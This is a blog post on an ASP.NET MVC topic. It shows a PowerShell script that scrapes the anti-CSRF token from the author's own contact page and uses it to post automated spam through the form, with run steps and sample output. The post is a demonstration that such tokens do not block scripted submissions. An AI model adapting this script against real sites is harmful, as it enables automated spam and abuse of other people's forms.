Home > .NET, ASP.NET MVC, PowerShell > Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell

Hacking Anti Cross-site Request Forgery Tokens (CSRF) With Powershell

December 16th, 2009

I ported the example of how to hack an Anti CRSF Token protected form - previously shown in my post What Are Anti Cross-site Request Forgery Tokens And What Are They Good For? - to PowerShell.

How to hack an Anti CRSF Token from PowerShell

POWERSHELL:
  1. function global:spam-adamdotcom(){
  2.  
  3.   # Load the assembly containing WebClientWithCookies and RegexUtilities
  4.   [Reflection.Assembly]::LoadFile((Resolve-Path "AdamDotCom.WebClientWithCookies.dll")) | out-null
  5.  
  6.   # Load the assembly containing System.Web.HttpUtilitiy
  7.   [void][Reflection.Assembly]::LoadWithPartialName("System.Web") | out-null 
  8.  
  9.   # create a new instance of the HTTP Web Client that supports cookies
  10.   $webClient = New-Object AdamDotCom.Common.Service.Utilities.WebClientWithCookies
  11.  
  12.   # download the page that contains the Anti CRSF Token
  13.   [void] $webClient.DownloadData("http://adam.kahtava.com/contact");
  14.  
  15.   # use a regular expression to grab the Anti CRSF Token
  16.   #  - this is an MVC site so we're looking for a token named "__RequestVerificationToken_Lw__"
  17.   $regex = "__RequestVerificationToken_Lw__=(?<CRSF_Token>[^;]+)"
  18.   $match = [regex]::matches($webClient.ResponseHeaders["Set-Cookie"], $regex)[0]
  19.   $antiCrsfToken = $match.Groups["CRSF_Token"].Captures[0].Value
  20.  
  21.   write-host "`nYour Anti CRSF Token is: " $antiCrsfToken
  22.  
  23.   # construct the message including the Anti CSRF Token
  24.   $message = "__RequestVerificationToken=" + [System.Web.HttpUtility]::UrlEncode($antiCrsfToken) +
  25.              "&amp;fromName=Johnathon Fink" +
  26.              "&amp;fromAddress=prancesw@rmcres.com" +
  27.              "&amp;subject=Call for your diploma now" +
  28.              "&amp;body=Is your lack of a degree..."
  29.  
  30.   # send spam-spam-spam
  31.   $webClient.Headers.Add("Content-Type", "application/x-www-form-urlencoded");
  32.   [void] $webClient.UploadData("http://adam.kahtava.com/contact/send", "POST",
  33.                               ([System.Text.Encoding]::UTF8.GetBytes($message)));
  34.  
  35.   write-host "`nSuccess!!! Your spam has been sent.`n"
  36. }

To run this script:

  1. Download the script
  2. Run PowerShell
  3. Load the script: .\Automated-AntiCSRF-Authentication-Script.ps1
  4. Start sending spam-spam-spam: PS > spam-adamdotcom

Here's the output as seen on my machine:

CODE:
  1. PS C:\> .\Automated-AntiCSRF-Authentication-Script.ps1
  2. PS C:\> spam-adamdotcom
  3.  
  4. Your Anti CRSF Token is:  f54ZlHS3L1Xyl65dYd1uYYh90ygNKYmCswXJUnr0GYtgcrJdJILsQ2jyFotzc10L
  5.  
  6. Success!!! Your spam has been sent.

This example uses a derivation of the .NET Framework's Web Client class but with Cookies enabled, so it depends on the AdamDotCom.Common.Service.dll assembly (browse the source here). This dependency can be automatically resolved by issuing the download-client function that's also found within the PowerShell script.

Contribute, view, or download the openly available script here: Automated-AntiCSRF-Authentication-Script.ps1

Author: Adam Kahtava Categories: .NET, ASP.NET MVC, PowerShell Tags:
  1. No comments yet.
  1. No trackbacks yet.